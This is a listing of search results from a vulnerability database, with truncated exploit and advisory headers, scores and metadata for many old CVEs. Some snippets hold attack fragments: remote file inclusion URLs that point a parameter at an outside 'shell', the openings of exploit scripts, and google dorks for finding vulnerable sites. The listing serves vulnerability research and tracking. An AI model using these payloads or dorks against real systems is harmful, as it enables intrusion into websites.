Lucene search
K
ExploitpackMost viewed

41207 matches found

exploitpack
exploitpack
added 2013/08/08 12:0 a.m.47 views

BigTree CMS 4.0 RC2 - Multiple Vulnerabilities

BigTree CMS 4.0 RC2 - Multiple Vulnerabilities Advisory ID: HTB23165 Product: BigTree CMS Vendor: BigTree CMS Vulnerable Versions: 4.0 RC2 and probably prior Tested Version: 4.0 RC2 Vendor Notification: July 17, 2013 Vendor Patch: July 17, 2013 Public Disclosure: August 7, 2013 Vulnerability Type...

7.5CVSS0.5AI score0.03295EPSS
Exploits8
exploitpack
exploitpack
added 2012/05/13 12:0 a.m.47 views

RealVNC 4.1.04.1.1 - Authentication Bypass

RealVNC 4.1.04.1.1 - Authentication Bypass Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit Date: 2012-05-13 Author: @fdiskyou e-mail: rui at deniable.org Version: 4.1.0 and 4.1.1 Tested on: Windows XP CVE: CVE-2006-2369 Requires vncviewer installed Basic port of hdmoore/msf2...

7.5CVSS0.6AI score0.91522EPSS
Exploits13
exploitpack
exploitpack
added 2011/09/13 12:0 a.m.47 views

Microsoft WINS - ECommEndDlg Input Validation Error (MS11-035MS11-070)

Microsoft WINS - ECommEndDlg Input Validation Error MS11-035MS11-070 Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ MS WINS ECommEndDlg Input Validation Error 1. Advisory Information Title: MS WINS ECommEndDlg Input Validation Error Advisory ID: CORE-2011-0526 Advisory URL:...

7.2CVSS0.4AI score0.07841EPSS
Exploits6
exploitpack
exploitpack
added 2011/09/09 12:0 a.m.48 views

BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)

BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow Metasploit Title : BisonFTP Server Remote Buffer Overflow Exploit Author : Veerendra G.G SecPod Technologies www.secpod.com Advisory : http://secpod.org/blog/?p=384 http://secpod.org/msf/bisonserverbof.rb Version : BisonFTP Server 'BisonFTP...

0.5AI score0.67091EPSS
Exploits7
exploitpack
exploitpack
added 2011/08/22 12:0 a.m.47 views

Adobe Photoshop CS5 - .gif Remote Code Execution

Adobe Photoshop CS5 - .gif Remote Code Execution Application: Adobe Photoshop CS5 GIF Remote Code Execution Platforms: Adobe Photoshop CS5 12.0 and 12.1 Exploitation: Remote code execution CVE Number: CVE-2011-2131 Adobe Vulnerability Identifier: APSB11-22 PRL: 2011-08 Author: Francis Provencher...

9.3CVSS0.3AI score0.222EPSS
Exploits3
exploitpack
exploitpack
added 2011/07/26 12:0 a.m.47 views

Apple Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass)

Apple Safari 5.0.5 - SVG Remote Code Execution DEP Bypass Abysssec Public Advisory apple killed one of our 0day no point to keep it private anymore : there is another version of exploit using POPup and thats more reliable but as you know safari block pop up by default so we found a cool way to...

9.3CVSS9AI score0.21639EPSS
Exploits8
exploitpack
exploitpack
added 2011/03/05 12:0 a.m.47 views

vTiger CRM 5.0.4 - Local File Inclusion

vTiger CRM 5.0.4 - Local File Inclusion !/usr/bin/python INFORMATION: Exploit Title: Vtiger CRM 5.0.4 Pre-Auth Local File Inclusion Exploit Google Dork: "The honest Open Source CRM" "vtiger CRM 5.0.4" Date: 5/3/2011 CVE: CVE-2009-3249 Windows link: http://bit.ly/fiOYCL Linux link:...

7.5CVSS0.09592EPSS
Exploits7
exploitpack
exploitpack
added 2011/02/06 12:0 a.m.47 views

Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities

Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities Trustwave's SpiderLabs Security Advisory TWSL2011-002: Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways D3G-CCR https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt Published: 2011-02-04 Version: 1.0 Vendor: Comcas...

10CVSS0.2AI score0.10069EPSS
Exploits8
exploitpack
exploitpack
added 2010/08/25 12:0 a.m.47 views

ClanSphere 2010 - Multiple Vulnerabilities

ClanSphere 2010 - Multiple Vulnerabilities Exploit Title: Clansphere Multiple vulnerabilities Date: 24/08/2010 Author: Sweet Contact : [email protected] Software Link: Download:http: http://sourceforge.net/projects/clansphere/ Version: all Tested on: WinXp sp3 Risk : HIGHT...

0.6AI score
Exploits0
exploitpack
exploitpack
added 2010/06/03 12:0 a.m.47 views

Member ID The Fish Index PHP - SQL Injection

Member ID The Fish Index PHP - SQL Injection , | ,---. , . |---. ,---. ,---. ,---. ,---. ,---. , . , | --- | | | | | |---' | | | |---' | | | | ---' ---| ---' ---' ---' ---' ------ ---' V Member ID The Fish Index PHP SQL Injection Vulnerability --== Author ==-- + Author : v4lc0m87 + Contact :...

0.4AI score
Exploits0
exploitpack
exploitpack
added 2010/04/21 12:0 a.m.47 views

Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities

Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities Bonsai Information Security - Advisory http://www.bonsai-sec.com/research/ Multiple XSS in Apache OFBiz 1. Advisory Information Title: Multiple XSS in Apache OFBiz Advisory ID: BONSAI-2010-0103 Advisory URL:...

4.3CVSS0.22941EPSS
Exploits15
exploitpack
exploitpack
added 2010/04/19 12:0 a.m.47 views

NX Web CMS (NX WCMS 4.5) - Multiple Vulnerabilities

NX Web CMS NX WCMS 4.5 - Multiple Vulnerabilities N/X - Web CMS N/X WCMS 4.5 Multiple Vulnerability =================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /'...

0.3AI score
Exploits0
exploitpack
exploitpack
added 2010/04/05 12:0 a.m.47 views

Portable AVS DVD Authoring 1.3.3.51 - Local Crash (PoC)

Portable AVS DVD Authoring 1.3.3.51 - Local Crash PoC C:\perl\bin Exploit Title: Portable AVS DVD Authoring Date: 2010/4pr/05 Author: R3d-D3v!L Version: v1.3.3.51 Tested on: windows XP sp3 Coded by x$file"; print $FILE "$boom"; close$FILE; print "Done..!\n";...

0.2AI score
Exploits0
exploitpack
exploitpack
added 2009/12/30 12:0 a.m.47 views

Azadi Network - page SQL Injection

Azadi Network - page SQL Injection | | | Azadi Network page Remote SQL Injection Vulnerability | |-------------------- Hussin X ------------------- | | Author: Hussin X | | Home : WwW.IQ-ty.CoM | | email : darkangelg85atYahooDoTcom | | | | script : www.azadinet.net | | DorK : "Powered By Azadi...

0.8AI score
Exploits0
exploitpack
exploitpack
added 2009/11/18 12:0 a.m.47 views

IBM SolidDB - Invalid Error Code

IBM SolidDB - Invalid Error Code 1. Advisory Information Title: IBM SolidDB invalid error code vulnerability Advisory Id: CORE-2009-1027 Advisory URL: http://www.coresecurity.com/content/ibm-soliddb-errorcode-dos Date published: 2009-11-18 Date of last update: 2009-11-18 Vendors contacted: IBM...

5CVSS0.3AI score0.09342EPSS
Exploits12
exploitpack
exploitpack
added 2009/09/02 12:0 a.m.47 views

Linux Kernel 2.6.19 (Debian 4) - udp_sendmsg Local Privilege Escalation (3)

Linux Kernel 2.6.19 Debian 4 - udpsendmsg Local Privilege Escalation 3 / hoagieudpsendmsg.c LOCAL LINUX KERNEL ROOT EXPLOIT include include include include include include include include / this code will be called from NFHOOK via output callback in kernel mode / void setcurrenttaskuidsgidstozero...

7.2CVSS0.9AI score0.0718EPSS
Exploits18
exploitpack
exploitpack
added 2009/07/17 12:0 a.m.47 views

Real Helix DNA - RTSP SETUP Request Handler

Real Helix DNA - RTSP SETUP Request Handler -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Real Helix DNA RTSP and SETUP request handler vulnerabilities 1. Advisory Information Title: Real Helix DNA RTSP and SETUP...

5CVSS6.5AI score0.08827EPSS
Exploits7
exploitpack
exploitpack
added 2009/01/28 12:0 a.m.47 views

Amaya Web Editor 11.0 - XML HTML Parser

Amaya Web Editor 11.0 - XML HTML Parser -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Amaya web editor XML and HTML parser vulnerabilities 1. Advisory Information Title: Amaya web editor XML and HTML parser...

0.5AI score
Exploits0
exploitpack
exploitpack
added 2009/01/15 12:0 a.m.47 views

MKPortal 1.2.1 - Multiple Vulnerabilities

MKPortal 1.2.1 - Multiple Vulnerabilities waraxe-2009-SA070 - Multiple Vulnerabilities in MKPortal = 1.2.1 ============================================================================== Author: Janek Vind "waraxe" Date: 15. January 2009 Location: Estonia, Tartu Web:...

0.3AI score
Exploits0
exploitpack
exploitpack
added 2008/12/22 12:0 a.m.47 views

Roundcube Webmail 0.2-3 Beta - Code Execution

Roundcube Webmail 0.2-3 Beta - Code Execution Public Release Date of POC: 2008-12-22 Author: Jacobo Avariento Gimeno Sofistic CVE id: CVE-2008-5619 Bugtraq id: 32799 Severity: Critical Vulnerability reported by: RealMurphy Intro ---- Roundcube Webmail is a browser-based IMAP client that uses...

10CVSS0.3AI score0.54003EPSS
Exploits15
exploitpack
exploitpack
added 2008/08/20 12:0 a.m.47 views

Anzio Web Print Object 3.2.30 - ActiveX Buffer Overflow

Anzio Web Print Object 3.2.30 - ActiveX Buffer Overflow -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Anzio Web Print Object Buffer Overflow Advisory Information Title: Anzio Web Print Object Buffer Overflow...

9.3CVSS1.2AI score0.11162EPSS
Exploits8
exploitpack
exploitpack
added 2008/07/01 12:0 a.m.47 views

OpenBSD 4.0 - vga Local Privilege Escalation

OpenBSD 4.0 - vga Local Privilege Escalation / A PRODUCTION OF LUL-DISLCOSURE INC. PROUDLY PRESENTS... 888 888 888 888 888 888 .d88b. 88888b. .d88b. 88888b. 88888b. .d8888b .d88888 d88""88b 888 "88b d8P Y8b 888 "88b 888 "88b 88K d88" 888 888 888 888 888 88888888 888 888 888 888 "Y8888b. 888 888...

0.6AI score
Exploits0
exploitpack
exploitpack
added 2007/09/21 12:0 a.m.47 views

Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure

Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure / source: https://www.securityfocus.com/bid/25774/info / The Linux kernel is prone to a local privilege-escalation vulnerability. Exploiting this issue may allow local attackers to gain elevated privileges, facilitati...

2.1CVSS6.1AI score0.00761EPSS
Exploits4
exploitpack
exploitpack
added 2007/09/21 12:0 a.m.47 views

iziContents rc6 - LocalRemote File Inclusion

iziContents rc6 - LocalRemote File Inclusion o bug /". . . . .-' -...-'/ o o remote file inclusion: http://site/path/modules/search/search.php?languagehome=&rootdp=zZz&gsLanguage=http://shell? http://site/path/modules/poll/inlinepoll.php?languagehome=&rootdp=zZz&gsLanguage=http://shell?...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2007/07/08 12:0 a.m.47 views

FlashGameScript 1.7 - user SQL Injection

FlashGameScript 1.7 - user SQL Injection FlashGameScript = 1.7 member.php$user SQL-Injection Exploit Vulnrability Discovered By: Xenduer77 ---July 7th, 2007 $user Is passed straight to the query without being filtered. SQL-INJECTION: For Version 1.7: -------...

0.9AI score
Exploits0
exploitpack
exploitpack
added 2007/05/03 12:0 a.m.47 views

PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion

PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion source: https://www.securityfocus.com/bid/23801/info PHPSecurityAdmin is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise...

7.5AI score
Exploits0
exploitpack
exploitpack
added 2007/03/01 12:0 a.m.47 views

Madwifi 0.9.2.1 - WPARSN IE Remote Kernel Buffer Overflow

Madwifi 0.9.2.1 - WPARSN IE Remote Kernel Buffer Overflow / ---- madwifi WPA/RSN IE remote kernel buffer overflow ------ expoit code by: sgrakkyu antifork.org -- 10/1/2007 CVE: 2006-6332 Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES for wpa .... memcpybuf, se-sewpaie, se-sewpaie1 + 2...

0.9AI score
Exploits0
exploitpack
exploitpack
added 2007/02/28 12:0 a.m.47 views

Apache 1.3.341.3.33 (Ubuntu Debian) - CGI TTY Privilege Escalation

Apache 1.3.341.3.33 Ubuntu Debian - CGI TTY Privilege Escalation / :: Kristian Hermansen :: Date: 20070229 Description: Local attacker can influence Apache to direct commands into an open tty owned by user who started apache process, usually root. This results in arbitrary command execution...

0.9AI score
Exploits0
exploitpack
exploitpack
added 2007/02/15 12:0 a.m.47 views

nabopoll 1.2 - survey.inc.php?path Remote File Inclusion

nabopoll 1.2 - survey.inc.php?path Remote File Inclusion By Cr@zyKing [email protected] Thakns : ApAci & Erne & Uyussman & Eno7 & Thehacker & CrackersChild & Liz0zim Script : nabopoll 1.x Risk : Remote File .nclude | High Site : http://nabocorp.com/ Google Dork : inurl:"nabopoll/" Exploit :...

0.4AI score
Exploits0
exploitpack
exploitpack
added 2007/02/02 12:0 a.m.47 views

phpBB++ Build 100 - phpbb_root_path Remote File Inclusion

phpBB++ Build 100 - phpbbrootpath Remote File Inclusion C xoron Name: phpBB++ phpbbrootpath Remote File Include Exploit Author: xoron Exploit coded by xoron Download: http://sourceforge.net/project/showfiles.php?groupid=86688&packageid=90098 xoron.biz - xoron.info Thanx: str0ke, kacper, k1tk4t,...

7.5AI score
Exploits0
exploitpack
exploitpack
added 2007/01/17 12:0 a.m.47 views

MGB 0.5.4.5 - email.php?id SQL Injection

MGB 0.5.4.5 - email.php?id SQL Injection !/usr/bin/perl MGB Google dork: intext:mgb.0.5.. & intext:mopzz | intext:mgb.0.5.4.. use IO::Socket::INET; usage unless @ARGV == 2; $host = $ARGV0; $dir = $ARGV1; $dir = "/$dir" if $dir ! /^//; $dir = "$dir/" if $dir ! //$/; $host = s/http:////g; $path...

0.1AI score
Exploits0
exploitpack
exploitpack
added 2006/11/12 12:0 a.m.47 views

PHPWind 5.0.1 - AdminUser Blind SQL Injection

PHPWind 5.0.1 - AdminUser Blind SQL Injection...

0.1AI score
Exploits0
exploitpack
exploitpack
added 2006/07/09 12:0 a.m.47 views

Mambo Componen phpBB 1.2.4 - Multiple Remote File Inclusions

Mambo Componen phpBB 1.2.4 - Multiple Remote File Inclusions source: https://www.securityfocus.com/bid/18914/info phpBB for Mambo is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker ca...

0.3AI score
Exploits0
exploitpack
exploitpack
added 2006/05/13 12:0 a.m.47 views

phpBB 2.0.20 - AdminRestore DBdefault_lang Remote Command Execution

phpBB 2.0.20 - AdminRestore DBdefaultlang Remote Command Execution !/usr/bin/php -q -d shortopentag=on you need an admin sid, works regardless of magicquotesgpc settings\r\n"; echo "tested and working against a fresh PhpBB installation\r\n\r\n"; if $argc5 echo "Usage: php ".$argv0." host path sid...

0.5AI score
Exploits0
exploitpack
exploitpack
added 2006/05/05 12:0 a.m.47 views

Limbo CMS 1.0.4.2 - catid SQL Injection

Limbo CMS 1.0.4.2 - catid SQL Injection i Limbo CMS option=weblinks sql injection exploit i coded by Oo Usage: ?host=hostname&path=limbopath&id=userid Exemple: ?host=127.0.0.1&path=/limbo&id=1 g Google: inurl:"index2.php?option=rss" OR "powered By Limbo CMS" /",$f && pregmatch"/login/",$f echo...

0.8AI score
Exploits0
exploitpack
exploitpack
added 2005/08/21 12:0 a.m.47 views

Mall23 - AddItem.asp SQL Injection

Mall23 - AddItem.asp SQL Injection source: https://www.securityfocus.com/bid/14898/info Mall23 is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise of t...

8.6AI score
Exploits0
exploitpack
exploitpack
added 2004/08/05 12:0 a.m.47 views

Ethereal 0.x - Multiple iSNS SMB SNMP Protocol Dissector Vulnerabilities

Ethereal 0.x - Multiple iSNS SMB SNMP Protocol Dissector Vulnerabilities // source: https://www.securityfocus.com/bid/10672/info Ethereal 0.10.5 has been released to address multiple vulnerabilities, including an iSNS protocol dissector vulnerability, a SMB protocol dissector vulnerability, and a...

5CVSS1.2AI score0.17961EPSS
Exploits3
exploitpack
exploitpack
added 2004/04/30 12:0 a.m.47 views

Coppermine Photo Gallery 1.2.0 RC4 - init.inc.php Remote File Inclusion

Coppermine Photo Gallery 1.2.0 RC4 - init.inc.php Remote File Inclusion source: https://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because t...

Exploits0
exploitpack
exploitpack
added 2003/04/04 12:0 a.m.47 views

PHPSysInfo 2.02.1 - index.php LNG File Disclosure

PHPSysInfo 2.02.1 - index.php LNG File Disclosure source: https://www.securityfocus.com/bid/7286/info PHPSysInfo has been reported to be vulnerable to a file disclosure issue. Local users may be capable of influencing the include path for PHPSysinfo language include files. If the malicious langua...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2020/03/03 12:0 a.m.46 views

RICOH Aficio SP 5210SF Printer - entryNameIn HTML Injection

RICOH Aficio SP 5210SF Printer - entryNameIn HTML Injection Exploit Title: RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection Discovery by: Olga Villagran Discovery Date: 2020-03-02 Vendor Homepage: https://www.ricoh.com/ Hardware Link:...

0.1AI score
Exploits0
exploitpack
exploitpack
added 2020/03/02 12:0 a.m.46 views

Joplin Desktop 1.0.184 - Cross-Site Scripting

Joplin Desktop 1.0.184 - Cross-Site Scripting Exploit Title: Joplin Desktop 1.0.184 - Cross-Site Scripting Exploit Author: Javier Olmedo Date: 2020-02-27 Vendor: Laurent Cozic Software Link: https://github.com/laurent22/joplin/archive/v1.0.184.zip Affected Version: 1.0.184 and before Patched...

4.3CVSS5.3AI score0.03566EPSS
Exploits5
exploitpack
exploitpack
added 2020/02/24 12:0 a.m.46 views

SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure

SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure Exploit Title: SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure Author: Todor Donev Date: 2020-02-23 Vendor: https://secu.jp/ Product Link: https://secu.jp/support/831nh1.html CVE: N/A SecuSTATION IPCAM-130 HD Came...

7.5AI score
Exploits0
exploitpack
exploitpack
added 2020/02/03 12:0 a.m.46 views

School ERP System 1.0 - Cross Site Request Forgery (Add Admin)

School ERP System 1.0 - Cross Site Request Forgery Add Admin Title: School ERP System 1.0 - Cross Site Request Forgery Add Admin Date: 2020-01-31 Exploit Author: J3rryBl4nks Vendor Homepage: https://sourceforge.net/projects/school-erp-ultimate/files/ Software Link:...

4.3CVSS0.3AI score0.01102EPSS
Exploits4
exploitpack
exploitpack
added 2019/12/30 12:0 a.m.46 views

AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enabledisable alarm)

AVE DOMINAplus 1.10.x - Cross-Site Request Forgery enabledisable alarm Exploit: AVE DOMINAplus 1.10.x - Cross-Site Request Forgery enable/disable alarm Date: 2019-12-30 Author: LiquidWorm Vendor: AVE S.p.A. Product web page: https://www.ave.it | https://www.domoticaplus.it Affected version: Web...

0.2AI score
Exploits0
exploitpack
exploitpack
added 2019/12/02 12:0 a.m.46 views

Visual Studio 2008 - XML External Entity Injection

Visual Studio 2008 - XML External Entity Injection Exploit Title: Visual Studio 2008 - XML External Entity Injection Discovery by: hyp3rlinx Date: 2019-12-02 Vendor Homepage: www.microsoft.com Software Link: Visual Studio 2008 Express IDE Tested Version: 2008 CVE: N/A + Credits: John Page aka...

0.4AI score
Exploits0
exploitpack
exploitpack
added 2019/10/29 12:0 a.m.46 views

Microsoft Windows Server 2012 - Group Policy Security Feature Bypass

Microsoft Windows Server 2012 - Group Policy Security Feature Bypass Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass Date: 2019-10-28 Exploit Author: Thomas Zuk Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R...

3.3CVSS6.5AI score0.08074EPSS
Exploits4
exploitpack
exploitpack
added 2019/10/22 12:0 a.m.46 views

Moxa EDR-810 - Command Injection Information Disclosure

Moxa EDR-810 - Command Injection Information Disclosure During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And th...

6.5CVSS5.8AI score0.08747EPSS
Exploits5
exploitpack
exploitpack
added 2019/09/09 12:0 a.m.46 views

Enigma NMS 65.0.0 - OS Command Injection

Enigma NMS 65.0.0 - OS Command Injection !/usr/bin/python -------------------------------------------------------------------- Exploit Title: Enigma NMS OS Command Injection NETSAS Pty Ltd Enigma NMS Date: 21 July 2019 Author: Mark Cross @xerubus | mogozobo.com Vendor: NETSAS Pty Ltd Vendor...

0.4AI score0.25279EPSS
Exploits5
exploitpack
exploitpack
added 2019/06/11 12:0 a.m.46 views

phpMyAdmin 4.8 - Cross-Site Request Forgery

phpMyAdmin 4.8 - Cross-Site Request Forgery Exploit Title: Cross Site Request Forgery CSRF Date: 11 June 2019 Exploit Author: Riemann Vendor Homepage: https://www.phpmyadmin.net/ Software Link: https://www.phpmyadmin.net/downloads/ Version: 4.8 Tested on: UBUNTU 16.04 LTS -Installed Docker image ...

4.3CVSS0.9AI score0.19184EPSS
Exploits4
exploitpack
exploitpack
added 2019/06/04 12:0 a.m.46 views

Zoho ManageEngine ServiceDesk Plus 9.3 - SearchN.do Cross-Site Scripting

Zoho ManageEngine ServiceDesk Plus 9.3 - SearchN.do Cross-Site Scripting Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do Date: 2019-06-04 Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage:...

4.3CVSS0.4AI score0.06029EPSS
Exploits5
Total number of security vulnerabilities5000